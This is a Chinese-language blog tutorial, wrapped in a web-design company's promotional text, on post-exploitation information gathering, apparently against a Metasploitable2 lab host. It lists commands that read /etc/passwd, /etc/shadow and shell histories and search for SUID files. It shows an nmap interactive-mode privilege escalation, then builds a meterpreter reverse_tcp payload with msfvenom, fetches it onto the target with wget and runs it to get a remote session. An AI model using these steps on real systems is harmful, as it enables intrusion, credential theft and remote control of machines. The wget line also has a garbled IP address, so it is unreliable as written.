這篇文章主要講解了“內(nèi)網(wǎng)滲透之如何實(shí)現(xiàn)信息收集”,文中的講解內(nèi)容簡單清晰,易于學(xué)習(xí)與理解,下面請大家跟著小編的思路慢慢深入,一起來研究和學(xué)習(xí)“內(nèi)網(wǎng)滲透之如何實(shí)現(xiàn)信息收集”吧!
成都創(chuàng)新互聯(lián)是一家專業(yè)提供龍圩企業(yè)網(wǎng)站建設(shè),專注與成都網(wǎng)站建設(shè)、成都網(wǎng)站設(shè)計、H5開發(fā)、小程序制作等業(yè)務(wù)。10年已為龍圩眾多企業(yè)、政府機(jī)構(gòu)等服務(wù)。創(chuàng)新互聯(lián)專業(yè)網(wǎng)站制作公司優(yōu)惠進(jìn)行中。
id 查看當(dāng)前用戶的權(quán)限和所在的管理組
python -c "import pty;pty.spawn('/bin/bash');" 會話提升
uname -a 查看linux版本內(nèi)核信息
cat /etc/*release 查看linux發(fā)行信息
dpkg -l 查看安裝的包
crontab -l 是否有計劃任務(wù)(這邊顯示沒有計劃任務(wù))
/sbin/ifconfig -a 查看ip地址等
cat /etc/passwd 普通用戶可以查看用戶的信息
cat /etc/shadow 賬號密碼信息(root權(quán)限)(這邊顯示沒有權(quán)限)
cat /root/.MySQL_history 查看mysql歷史操作(靶機(jī)和kali都未對mysql進(jìn)行過操作所以沒有這個文件)
cat /root/.bash_history 查看用戶指令歷史記錄
cat /proc/version 查看內(nèi)核信息
find / -perm -u=s -type f 2>/dev/null 匹配高權(quán)限的文件,看是否有利用點(diǎn)
/:代表查詢位置,當(dāng)前設(shè)置為根目錄
-perm:代表權(quán)限
-u=s:代表用戶的權(quán)限 s:superbin
-type:類型 ,f代表文件 file
nmap --interactive -->!sh 利用nmap3.5<4.6.4之間存在的漏洞進(jìn)行提權(quán) |
先在kali上生成木馬
msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp lhost=192.168.227.129 lport=4444 -f elf -o xx.elf linux的x86 payload需要跟上x86 |
首先先然metasploit2下載kali上的木馬文件
wget http://1192.168.227.129:80/xx.elflinux從命令行下載網(wǎng)頁文件 |
然后將文件賦予能執(zhí)行的權(quán)利(這里為了方便直接給了4777)
chmod 4777 xx.elf 修改文件權(quán)限 |
因?yàn)槭莑inux系統(tǒng)所以在設(shè)置監(jiān)聽的payload的時候需要也是linux
linux執(zhí)行xx.elf文件
成功進(jìn)入到meterpreter界面
感謝各位的閱讀,以上就是“內(nèi)網(wǎng)滲透之如何實(shí)現(xiàn)信息收集”的內(nèi)容了,經(jīng)過本文的學(xué)習(xí)后,相信大家對內(nèi)網(wǎng)滲透之如何實(shí)現(xiàn)信息收集這一問題有了更深刻的體會,具體使用情況還需要大家實(shí)踐驗(yàn)證。這里是創(chuàng)新互聯(lián),小編將為大家推送更多相關(guān)知識點(diǎn)的文章,歡迎關(guān)注!